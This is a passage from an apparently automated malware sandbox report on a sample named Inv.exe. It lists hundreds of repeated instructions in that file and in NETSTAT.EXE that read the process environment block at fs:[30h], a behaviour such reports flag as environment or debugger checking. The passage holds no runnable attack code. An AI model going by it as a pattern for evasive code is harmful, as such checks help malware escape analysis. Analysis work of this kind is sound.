          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01945210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01963A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01958A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0198927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A0E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01967D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01983D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01958794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019837F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0195FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019736CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019FFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01988EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019716E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A18ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019576E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]
